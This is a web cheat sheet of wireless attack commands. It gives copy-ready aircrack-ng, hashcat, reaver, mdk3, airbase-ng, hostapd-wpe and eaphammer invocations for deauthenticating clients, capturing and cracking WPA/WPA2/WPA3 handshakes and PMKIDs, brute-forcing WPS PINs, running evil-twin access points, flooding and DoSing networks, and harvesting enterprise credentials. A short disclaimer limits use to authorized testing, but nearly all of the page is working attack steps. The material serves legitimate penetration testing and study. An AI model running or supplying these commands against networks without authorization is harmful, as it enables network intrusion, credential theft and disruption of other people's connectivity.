Wireless Security Cheat Sheet 2026: WiFi Hacking & Analysis

November 9, 2025

Comprehensive wireless security cheat sheet with tools for WiFi testing. Includes aircrack-ng, hcxdumptool, WPA/WPA2/WPA3 cracking, and monitoring techniques.

On This Page

Wireless Security Testing requires specialized tools for analyzing and auditing WiFi networks. This comprehensive wireless security cheat sheet covers essential tools including aircrack-ng, hcxdumptool, Wireshark, and techniques for WPA/WPA2/WPA3 testing, monitor mode, packet capture, and hash cracking. For authorized testing of networks you own or have explicit permission to test.

Quick Navigation: Monitor Mode | Discovery | WPA Cracking | WPA3 | Rogue AP | Injection

Disclaimer

These tools are for authorized security testing only. Unauthorized access to wireless networks is illegal. Only test networks you own or have explicit permission to test.

Interface Management

Monitor Mode

# Check interface
iwconfig
iw dev

# Kill interfering processes
airmon-ng check kill
systemctl stop NetworkManager
systemctl stop wpa_supplicant

# Enable monitor mode
airmon-ng start wlan0
# Creates wlan0mon

# Manual monitor mode
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

# Disable monitor mode
airmon-ng stop wlan0mon

Channel Hopping

# Set specific channel
iwconfig wlan0mon channel 6
iw dev wlan0mon set channel 6

# Channel hopping script
while true; do
  for channel in {1..13}; do
    iw dev wlan0mon set channel $channel
    sleep 1
  done
done

Network Discovery

Airodump-ng

# Basic scan
airodump-ng wlan0mon

# Scan specific channel
airodump-ng -c 6 wlan0mon

# Capture to file
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Show WPS networks
airodump-ng --wps wlan0mon

# 5GHz scan
airodump-ng --band a wlan0mon

Kismet

# Start Kismet
kismet

# CLI mode
kismet_server
kismet_client

WEP Cracking

Aircrack-ng Suite

# Capture IVs
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep wlan0mon

# Fake authentication
aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h YOUR:MAC:ADDR wlan0mon

# ARP replay attack
aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h YOUR:MAC:ADDR wlan0mon

# Crack WEP
aircrack-ng wep-01.cap

WPA/WPA2 Cracking

Capture Handshake

# Start capture
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa wlan0mon

# Deauth clients (force handshake)
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF -c CLIENT:MAC wlan0mon

# Verify handshake
aircrack-ng wpa-01.cap

Dictionary Attack

# Aircrack-ng
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-01.cap

# With ESSID
aircrack-ng -w wordlist.txt -e "SSID" wpa-01.cap

Hashcat (GPU acceleration)

# Convert to hashcat format
cap2hccapx wpa-01.cap output.hccapx

# Or use hcxpcapngtool (newer)
hcxpcapngtool -o output.22000 wpa-01.cap

# Crack WPA/WPA2 (hashcat 22000)
hashcat -m 22000 output.22000 wordlist.txt

# With rules
hashcat -m 22000 output.22000 wordlist.txt -r rules/best64.rule

# Mask attack (8-digit numbers)
hashcat -m 22000 output.22000 -a 3 ?d?d?d?d?d?d?d?d

Pyrit (GPU)

# Import ESSID
pyrit -e "SSID" -i wordlist.txt import_passwords

# Batch processing
pyrit batch

# Attack
pyrit -r wpa-01.cap attack_db

WPA3 (SAE) Testing

# Capture with hcxdumptool
hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1

# Convert for cracking
hcxpcapngtool -o hash.22000 capture.pcapng

# Crack (same as WPA2)
hashcat -m 22000 hash.22000 wordlist.txt

WPS Attacks

Reaver

# Basic attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

# With delay
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -d 5

# Pixie dust attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -K

# Specific channel
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vv

Bully

# Basic attack
bully wlan0mon -b AA:BB:CC:DD:EE:FF -c 6

# Pixie dust
bully wlan0mon -b AA:BB:CC:DD:EE:FF -d -v 3

PixieWPS (standalone)

pixiewps -e PKE -r PKR -s HASH1 -z HASH2 -a AUTHKEY -n E-NONCE

Evil Twin / Rogue AP

Airbase-ng

# Create fake AP
airbase-ng -e "FreeWiFi" -c 6 wlan0mon

# With specific BSSID
airbase-ng -a AA:BB:CC:DD:EE:FF -e "FreeWiFi" -c 6 wlan0mon

Hostapd

# Configuration file
cat > hostapd.conf <<EOF
interface=wlan0
driver=nl80211
ssid=FreeWiFi
channel=6
hw_mode=g
EOF

# Start AP
hostapd hostapd.conf

Fluxion (automated)

# Interactive evil twin attack
./fluxion.sh

Packet Injection Testing

# Test injection
aireplay-ng --test wlan0mon

# Specific AP
aireplay-ng --test wlan1 -a AA:BB:CC:DD:EE:FF

Client Attacks

Deauthentication

# Deauth all clients
aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF wlan0mon

# Deauth specific client
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CLIENT:MAC wlan0mon

# Continuous deauth
aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF -c CLIENT:MAC wlan0mon

MDK3

# Beacon flood
mdk3 wlan0mon b -f targetssids.txt

# Deauth
mdk3 wlan0mon d -b blacklist.txt

# Authentication DoS
mdk3 wlan0mon a -a AA:BB:CC:DD:EE:FF

Enterprise (802.1X) Attacks

Hostapd-WPE

# Evil twin for WPA-Enterprise
hostapd-wpe hostapd-wpe.conf

# Captures NTLM hashes and challenge/response
# Found in /var/log/hostapd-wpe.log

EAP-HAMMER

# EAP relay attacks
eaphammer --cert-wizard
eaphammer -i wlan0 --channel 6 --auth wpa-eap --essid "CorpWiFi" --creds

Passive Monitoring

Wireshark

# GUI
wireshark

# Capture on interface
wireshark -i wlan0mon

# Filters
wlan.fc.type_subtype == 0x08  # Beacons
wlan.fc.type_subtype == 0x04  # Probe requests
eapol                           # WPA handshakes

Tshark

# Capture 802.11
tshark -i wlan0mon -w capture.pcap

# Display filter
tshark -r capture.pcap -Y "wlan.fc.type_subtype == 0x08"

# Extract handshakes
tshark -r capture.pcap -Y eapol -w handshakes.pcap

Crunch (Wordlist Generation)

# Generate wordlist
crunch 8 8 0123456789 -o numberlist.txt

# Pattern-based
crunch 10 10 -t @@@@@@%%%% -o list.txt
# @ = lowercase
# , = uppercase
# % = numbers
# ^ = symbols

# Common WiFi patterns
crunch 8 12 0123456789 -o phones.txt

Cowpatty (WPA-PSK)

# Standard attack
cowpatty -r capture.cap -f wordlist.txt -s "SSID"

# With precomputed hashes
cowpatty -r capture.cap -d hashfile -s "SSID"

# Generate hashfile
genpmk -f wordlist.txt -d hashfile -s "SSID"

Wifite (Automated)

# Auto attack
wifite

# WPS only
wifite --wps

# WPA only
wifite --wpa

# Custom wordlist
wifite --dict /path/to/wordlist.txt

Useful One-Liners

# Find hidden SSIDs
airodump-ng wlan0mon --output-format csv -w scan
# Wait for probe responses

# Get clients connected to AP
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF wlan0mon

# Quick handshake capture
timeout 60 airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon & sleep 5 && aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon

# Check if handshake captured
aircrack-ng capture-01.cap | grep handshake

# Convert .cap to .hccapx for hashcat
cap2hccapx capture.cap output.hccapx

# Extract PMKID from capture
hcxpcapngtool -o pmkid.22000 --filter-by=PMKID capture.pcapng

# Generate WPA/WPA2 candidate passwords
crunch 8 63 | aircrack-ng -w - -e "SSID" capture.cap

# RockYou (included in Kali Linux)
/usr/share/wordlists/rockyou.txt

Hardware Recommendations

  • Alfa AWUS036ACH - 802.11ac, monitor mode, injection
  • Alfa AWUS036NHA - 802.11n, reliable, well-supported
  • TP-Link TL-WN722N v1 - Budget option (v2/v3 don’t work)
  • Panda PAU09 N600 - Dual-band
  • WiFi Pineapple - Purpose-built auditing device

📥 Download & Print

Want a PDF version? This wireless security cheat sheet is optimized for printing:

  1. Use your browser’s Print function (Ctrl/Cmd + P)
  2. Select “Save as PDF”
  3. Choose landscape orientation for best results

Stay Updated: Bookmark this page for the latest wireless security tools and techniques.

Last Updated: March 8, 2026